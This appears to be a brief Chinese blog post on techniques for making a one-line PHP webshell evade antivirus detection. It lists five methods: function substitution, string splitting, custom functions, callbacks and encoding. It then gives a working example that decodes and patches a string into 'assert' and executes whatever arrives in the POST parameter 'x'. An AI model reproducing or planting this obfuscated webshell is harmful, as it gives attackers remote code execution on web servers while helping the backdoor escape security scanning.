simonlee-hello

制作免杀一句话思路

  1. 函数替换
  2. 函数字符串拆分组合
  3. 自定义函数
  4. 回调函数
  5. 编码绕过

比如PHP

<?php
$a = base64_decode(\'YXNzZXh4\');
$a = substr_replace($a,\'rt\',4);
$a($_POST[\'x\']); 
?>

分类:

技术点:

相关文章: